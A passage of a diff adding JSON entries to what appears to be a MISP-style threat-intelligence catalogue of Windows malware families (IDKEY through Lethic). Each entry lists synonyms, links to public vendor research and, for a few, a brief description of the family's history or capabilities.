"https://malpedia.caad.fkie.fraunhofer.de/details/win.idkey", + "https://isc.sans.edu/diary/22766" + ] + }, + "uuid": "3afecded-3461-45f9-8159-e8328e56a916", + "value": "IDKEY", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.iisniff", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Curious-Case-of-the-Malicious-IIS-Module/" + ] + }, + "uuid": "3b746f77-214b-44f9-9ef2-0ae6b52561d6", + "value": "IISniff", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.imecab", + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" + ] + }, + "uuid": "0ea585ef-bd32-4f5b-a3fe-bb48dc0956c7", + "value": "Imecab", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.imminent_monitor_rat", + "https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/" + ] + }, + "uuid": "53021414-97ad-4102-9cff-7a0e1997f867", + "value": "Imminent Monitor RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Foudre" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.infy", + "http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/", + "https://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/", + "https://github.com/pan-unit42/iocs/blob/master/prince_of_persia/hashes.csv", + "https://www.intezer.com/prince-of-persia-the-sands-of-foudre/", + "https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/" + ] + }, + "uuid": "53616ce4-9b8e-45a0-b380-9e778cd95ae2", + "value": "Infy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.innaput_rat", + "https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/" + ] + }, + "uuid": "dd486e92-54fe-4306-9aab-05863cb6c6e1", + "value": "InnaputRAT", + "description": "InnaputRAT, a RAT capable of exfiltrating files from victim machines, was distributed by threat actors using phishing and Godzilla Loader. The RAT has evolved through multiple variants dating back to 2016. Recent campaigns distributing InnaputRAT beaconed to live C2 as of March 26, 2018." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.invisimole", + "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" + ] + }, + "uuid": "22755fda-497e-4ef0-823e-5cb6d8701420", + "value": "InvisiMole", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Gozi ISFB", + "IAP", + "Pandemyia" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb", + "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html", + "https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb", + "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html", + "https://lokalhost.pl/gozi_tree.txt", + "https://www.youtube.com/watch?v=jlc7Ahp8Iqg", + "https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245", + "https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/", + "http://blog.talosintelligence.com/2018/03/gozi-isfb-remains-active-in-2018.html", + "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/", + "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15", + "https://www.rsa.com/de-de/resources/pandemiya-emerges-new-malware-alternative-zeus-based", + "https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html", + "https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/" + ] + }, + "uuid": "a171321e-4968-4ac0-8497-3250c1f0d77d", + "value": "ISFB", + "description": "2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked. This led to two main branches: one became known as Gozi Prinimalka, which was merge with Pony and became Vawtrak/Neverquest.\r\n\r\nThe other branch became known as Gozi ISFB, or ISFB in short. Webinject functionality was added to this version.\r\n\r\nThere is one panel which often was used in combination with ISFB: IAP. The panel's login page comes with the title 'Login - IAP'. The body contains 'AUTHORIZATION', 'Name:', 'Password:' and a single button 'Sign in' in a minimal design. Often, the panel is directly accessible by entering the C2 IP address in a browser. But there are ISFB versions which are not directly using IAP. The bot accesses a gate, which is called the 'Dreambot' gate. See win.dreambot for further information.\r\n\r\nISFB often was protected by Rovnix. This led to a further complication in the naming scheme - many companies started to call ISFB Rovnix. Because the signatures started to look for Rovnix, other trojans protected by Rovnix (in particular ReactorBot and Rerdom) sometimes got wrongly labelled.\r\n\r\nIn April 2016 a combination of Gozi ISFB and Nymaim was detected. This breed became known as GozNym. The merge uses a shellcode-like version of Gozi ISFB, that needs Nymaim to run. The C2 communication is performed by Nymaim.\r\n\r\nSee win.gozi for additional historical information." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismagent", + "http://www.clearskysec.com/ismagent/" + ] + }, + "uuid": "67457708-1edd-4ef1-9ec0-1c5eb7c75fe2", + "value": "ISMAgent", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismdoor", + "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon", + "http://www.clearskysec.com/greenbug/" + ] + }, + "uuid": "e09d8dd6-6857-4607-a0ba-9c8d2a66083b", + "value": "ISMDoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ispy_keylogger", + "https://www.zscaler.com/blogs/research/ispy-keylogger" + ] + }, + "uuid": "8c95cb51-1044-4dcd-9cac-ad9f2e3b9070", + "value": "iSpy Keylogger", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.isr_stealer", + "https://securingtomorrow.mcafee.com/mcafee-labs/phishing-attacks-employ-old-effective-password-stealer/" + ] + }, + "uuid": "27bab2fb-d324-42c2-9df3-669bb87c3989", + "value": "ISR Stealer", + "description": "ISR Stealer is a modified version of the Hackhound Stealer. It is written in VB and often comes in a .NET-wrapper.\r\nISR Stealer makes use of two Nirsoft tools: Mail PassView and WebBrowserPassView.\r\n\r\nIncredibly, it uses an hard-coded user agent string: HardCore Software For : Public" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.isspace", + "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/" + ] + }, + "uuid": "a3f41c96-a5c8-4dfe-b7fa-d9d75f97979a", + "value": "IsSpace", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jackpos", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/JackPOS-%E2%80%93-The-House-Always-Wins/" + ] + }, + "uuid": "3acb37f4-5614-4932-b12f-9f1c256895f2", + "value": "JackPOS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaff", + "http://malware-traffic-analysis.net/2017/05/16/index.html", + "https://www.proofpoint.com/us/threat-insight/post/jaff-new-ransomware-from-actors-behind-distribution-of-dridex-locky-bart", + "http://blog.talosintelligence.com/2017/05/jaff-ransomware.html" + ] + }, + "uuid": "2c51a717-726b-4813-9fcc-1265694b128e", + "value": "Jaff", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jager_decryptor" + ] + }, + "uuid": "13a7a2ff-c945-4b42-a112-dcf09f9ed9c9", + "value": "Jager Decryptor", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Reconcyc" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaku", + "https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146", + "https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf" + ] + }, + "uuid": "0f02ea79-5833-46e0-8458-c4a863a5a112", + "value": "Jaku", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jasus", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + "uuid": "af6e89ec-0adb-4ce6-b4e6-610827e722ea", + "value": "Jasus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jigsaw" + ] + }, + "uuid": "910c3fd2-56e5-4f1d-8df0-2aa0b293b7d9", + "value": "Jigsaw", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jimmy", + "https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/" + ] + }, + "uuid": "551b568f-68fa-4483-a10c-a6452ae6289e", + "value": "Jimmy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.joanap", + "https://www.us-cert.gov/ncas/alerts/TA18-149A", + "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A", + "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/" + ] + }, + "uuid": "bbbef449-2fe6-4c25-a85c-69af9fa6208b", + "value": "Joanap", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.joao", + "https://www.welivesecurity.com/2017/08/22/gamescom-2017-fun-blackhats/" + ] + }, + "uuid": "8201c8d2-1dab-4473-bbdf-42952b3d5fc6", + "value": "Joao", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jolob", + "http://pwc.blogs.com/cyber_security_updates/2014/10/scanbox-framework-whos-affected-and-whos-using-it-1.html" + ] + }, + "uuid": "97f12ca8-dc84-4a8c-b4c6-8ec1d1e79631", + "value": "Jolob", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jqjsnicker", + "http://marcmaiffret.com/vault7/" + ] + }, + "uuid": "2e457b93-de45-4b1d-8e1d-b8d19c2c555a", + "value": "JQJSNICKER", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jripbot", + "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" + ] + }, + "uuid": "e895a0d2-fe4b-4793-9440-9db2d56a97f2", + "value": "JripBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kagent", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + "uuid": "eab42a8e-22e7-49e4-8a26-44f14b6f67bb", + "value": "KAgent", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.karagany", + "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" + ] + }, + "uuid": "857e61fe-ccb2-426b-ad7b-696112f48dbb", + "value": "Karagany", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kardonloader", + "https://asert.arbornetworks.com/kardon-loader-looks-for-beta-testers/", + "https://engineering.salesforce.com/kardon-loader-malware-analysis-adaaaab42bab" + ] + }, + "uuid": "8b33ba21-9af7-4536-bd02-23dd863147e8", + "value": "Kardon Loader", + "description": "According to ASERT, Kardon Loader is a fully featured downloader, enabling the download and installation of other malware, eg. banking trojans/credential theft etc.This malware has been on sale by an actor under the username Yattaze, starting in late April. The actor offers the sale of the malware as a standalone build with charges for each additional rebuild, or the ability to set up a botshop in which case any customer can establish their own operation and further sell access to a new customer base." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.karius", + "https://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/", + "https://research.checkpoint.com/banking-trojans-development/" + ] + }, + "uuid": "8a01c3be-17b7-4e5a-b0b2-6c1f5ccb82cf", + "value": "Karius", + "description": "According to checkpoint, Karius is a banking trojan in development, borrowing code from Ramnit, Vawtrack as well as Trickbot, currently implementing webinject attacks only.\r\n\r\nIt comes with an injector that loads an intermediate \"proxy\" component, which in turn loads the actual banker component.\r\n\r\nCommunication with the c2 are in json format and encrypted with RC4 with a hardcoded key.\r\n\r\nIn the initial version, observed in March 2018, the webinjects were hardcoded in the binary, while in subsequent versions, they were received by the c2.\r\n\r\n" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kasperagent", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/", + "https://www.threatconnect.com/blog/kasperagent-malware-campaign/" + ] + }, + "uuid": "d9c14095-8885-406c-b56b-06f3a1a88c1c", + "value": "KasperAgent", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kazuar", + "http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/" + ] + }, + "uuid": "bab92070-3589-4b7e-bf05-4f54bfefc2ca", + "value": "Kazuar", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kegotip" + ] + }, + "uuid": "96bb088c-7bb7-4a07-a9d7-a3cbb45d5755", + "value": "Kegotip", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kelihos", + "https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/", + "https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/", + "https://www.cyberscoop.com/doj-kelihos-botnet-peter-levashov-severa/", + "https://en.wikipedia.org/wiki/Kelihos_botnet" + ] + }, + "uuid": "7d69892e-d582-4545-8798-4a9a84a821ea", + "value": "Kelihos", + "description": "" + }, + { + "meta": { + "synonyms": [ + "TSSL" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.keyboy", + "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/", + "https://citizenlab.ca/2016/11/parliament-keyboy/", + "https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/" + ] + }, + "uuid": "28c13455-7f95-40a5-9568-1e8732503507", + "value": "KeyBoy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.keylogger_apt3", + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", + "https://twitter.com/smoothimpact/status/773631684038107136", + "https://intrusiontruth.wordpress.com/2017/05/09/apt3-is-boyusec-a-chinese-intelligence-contractor/" + ] + }, + "uuid": "68039fbe-2eee-4666-b809-32a011e9852a", + "value": "APT3 Keylogger", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.keymarble", + "https://www.us-cert.gov/ncas/analysis-reports/AR18-221A" + ] + }, + "uuid": "0c213d7f-8c71-4341-aeb0-13be71fbf4e5", + "value": "KEYMARBLE", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.khrat", + "https://blogs.forcepoint.com/security-labs/trojanized-adobe-installer-used-install-dragonok%E2%80%99s-new-custom-backdoor", + "https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/" + ] + }, + "uuid": "361d3f09-8bc8-4b5a-803f-8686cf346047", + "value": "KHRAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kikothac", + "https://www.group-ib.com/resources/threat-research/silence.html" + ] + }, + "uuid": "f2ca304f-6577-4f3a-983c-beec447a9493", + "value": "Kikothac", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.killdisk", + "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/" + ] + }, + "uuid": "e81f3e3f-966c-4c99-8d4b-fc0a1d3bb027", + "value": "KillDisk", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Kasper Internet Non-Security", + "Maple" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kins", + "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/", + "https://github.com/nyx0/KINS", + "https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/", + "https://www.youtube.com/watch?v=C-dEOt0GzSE" + ] + }, + "uuid": "07f6bbff-a09a-4580-96ea-62795a8dae11", + "value": "KINS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.klrd", + "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://www.morphick.com/resources/news/klrd-keylogger" + ] + }, + "uuid": "70459959-5a20-482e-b714-2733f5ff310e", + "value": "KLRD", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", + "https://github.com/zerosum0x0/koadic" + ] + }, + "uuid": "3b5faa15-e87e-4aaf-b791-2c5e593793e6", + "value": "Koadic", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kokokrypt", + "https://twitter.com/struppigel/status/812726545173401600" + ] + }, + "uuid": "f7674d06-450a-4150-9180-afef94cce53c", + "value": "KokoKrypt", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.konni", + "http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html", + "http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html", + "https://vallejo.cc/2017/07/08/analysis-of-new-variant-of-konni-rat/", + "https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant" + ] + }, + "uuid": "f982fa2d-f78f-4fe1-a86d-d10471a3ebcf", + "value": "Konni", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.koobface" + ] + }, + "uuid": "9430ce27-c8c5-44fb-9255-47d76a8903b3", + "value": "KoobFace", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Bisonal" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.korlia", + "https://securitykitten.github.io/2014/11/25/curious-korlia.html", + "https://camal.coseinc.com/publish/2013Bisonal.pdf", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/", + "https://www.rsaconference.com/writable/presentations/file_upload/cle-t04_final_v1.pdf", + "http://asec.ahnlab.com/tag/Operation%20Bitter%20Biscuit" + ] + }, + "uuid": "52d98d2f-db62-430d-8658-5cadaeff6cd7", + "value": "Korlia", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kovter", + "https://blog.malwarebytes.com/threat-analysis/2016/07/untangling-kovter/", + "https://blog.malwarebytes.com/threat-analysis/2015/01/major-malvertising-campaign-hits-sites-with-combined-total-monthly-traffic-of-1-5bn-visitors/", + "https://github.com/ewhitehats/kovterTools/blob/master/KovterWhitepaper.pdf" + ] + }, + "uuid": "af3a0643-7a80-4b8f-961b-aea18e78715e", + "value": "Kovter", + "description": "Kovter is a Police Ransomware\r\n\r\nFeb 2012 - Police Ransomware\r\nAug 2013 - Became AD Fraud\r\nMar 2014 - Ransomware to AD Fraud malware\r\nJune 2014 - Distributed from sweet orange exploit kit\r\nDec 2014 - Run affiliated node\r\nApr 2015 - Spread via fiesta and nuclear pack\r\nMay 2015 - Kovter become fileless\r\n2016 - Malvertising campaign on Chrome and Firefox\r\nJune 2016 - Change in persistence\r\nJuly 2017 - Nemucod and Kovter was packed together\r\nJan 2018 - Cyclance report on Persistence" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kpot_stealer", + "https://www.flashpoint-intel.com/blog/malware-campaign-targets-jaxx-cryptocurrency-wallet-users/" + ] + }, + "uuid": "b1fe4226-1783-48d4-b1d2-417703a03b3d", + "value": "KPOT Stealer", + "description": "" + }, + { + "meta": { + "synonyms": [ + "BlackMoon" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker", + "https://www.proofpoint.com/us/threat-insight/post/Updated-Blackmoon-Banking-Trojan", + "http://training.nshc.net/ENG/Document/virus/20140305_Internet_Bank_Pharming_-_BlackMoon_Ver_1.0_External_ENG.pdf", + "https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/", + "http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets-south-korea-through-adware-and-exploit-kits-2/" + ] + }, + "uuid": "f4008c19-e81a-492a-abfe-f177e1ac5bce", + "value": "KrBanker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.krdownloader", + "https://www.fidelissecurity.com/threatgeek/2017/05/blackmoon-rising-banking-trojan-back-new-framework" + ] + }, + "uuid": "c346faf0-9eb4-4f8a-8547-30e6641b8972", + "value": "KrDownloader", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Osiris" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos", + "https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack", + "https://www.proofpoint.com/us/threat-insight/post/kronos-reborn", + "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/", + "https://www.lexsi.com/securityhub/overview-kronos-banking-malware-rootkit/?lang=en", + "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/", + "https://www.lexsi.com/securityhub/kronos-decrypting-the-configuration-file-and-injects/?lang=en", + "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/", + "https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos", + "https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/", + "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware", + "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/" + ] + }, + "uuid": "62a7c823-9af0-44ee-ac05-8765806d2a17", + "value": "Kronos", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Barys", + "Gofot", + "Kuaibpy" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuaibu8" + ] + }, + "uuid": "7d8943a4-b710-48d3-9352-e9b42516d2b7", + "value": "Kuaibu", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuluoz" + ] + }, + "uuid": "f9b3757e-99c7-4999-8b79-87609407f895", + "value": "Kuluoz", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kurton", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "1fc49b8c-647a-4484-a2f6-e6f2311f8b58", + "value": "Kurton", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs", + "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia" + ] + }, + "uuid": "2fc93875-eebb-41ff-a66e-84471c6cd5a3", + "value": "Kwampirs", + "description": "Kwampirs is a family of malware which uses SMB to spread. It typically will not execute or deploy in environments in which there is no publicly available admin$ share. It is a fully featured backdoor which can download additional modules. Typical C2 traffic is over HTTP and includes \"q=[ENCRYPTED DATA]\" in the URI." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lambert", + "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/", + "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7", + "http://adelmas.com/blog/longhorn.php", + "https://www.youtube.com/watch?v=jeLd-gw2bWo" + ] + }, + "uuid": "3af9397a-b4f7-467d-93af-b3d77dcfc38d", + "value": "Lambert", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lamdelin", + "http://news.thewindowsclub.com/poorly-coded-lamdelin-lockscreen-ransomware-alt-f4-88576/" + ] + }, + "uuid": "da79cf10-df9f-4cd3-bbce-ae9f357633f0", + "value": "Lamdelin", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.latentbot", + "http://malware-traffic-analysis.net/2017/04/25/index.html", + "https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html", + "https://blog.malwarebytes.com/threat-analysis/2017/06/latentbot/", + "https://www.cert.pl/news/single/latentbot-modularny-i-silnie-zaciemniony-bot/", + "https://cys-centrum.com/ru/news/module_trojan_for_unauthorized_access" + ] + }, + "uuid": "7fc74551-013f-4dd1-8da9-9266edcc45d0", + "value": "LatentBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarus", + "https://www.bleepingcomputer.com/news/security/polish-banks-infected-with-malware-hosted-on-their-own-governments-site/", + "https://twitter.com/PhysicalDrive0/status/828915536268492800", + "https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html", + "http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html" + ] + }, + "uuid": "0caf0292-b01a-4439-b56f-c75b71900bc0", + "value": "Lazarus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.laziok", + "https://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector", + "https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=802" + ] + }, + "uuid": "686a9217-3978-47c0-9989-dd2a3438ba72", + "value": "Laziok", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.leash", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/" + ] + }, + "uuid": "8faf7592-be5c-44af-b1ca-2bd8caec195d", + "value": "Leash", + "description": "" + }, + { + "meta": { + "synonyms": [ + "shoco" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.leouncia", + "https://www.rsaconference.com/writable/presentations/file_upload/crwd-t11-hide_and_seek-how_threat_actors_respond_in_the_face_of_public_exposure.pdf", + "https://www.fireeye.com/blog/threat-research/2010/12/leouncia-yet-another-backdoor.html", + "https://www.fireeye.com/blog/threat-research/2010/12/leouncia-yet-another-backdoor-part-2.html" + ] + }, + "uuid": "41da41aa-0729-428a-8b82-636600f8e230", + "value": "Leouncia", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lethic", + 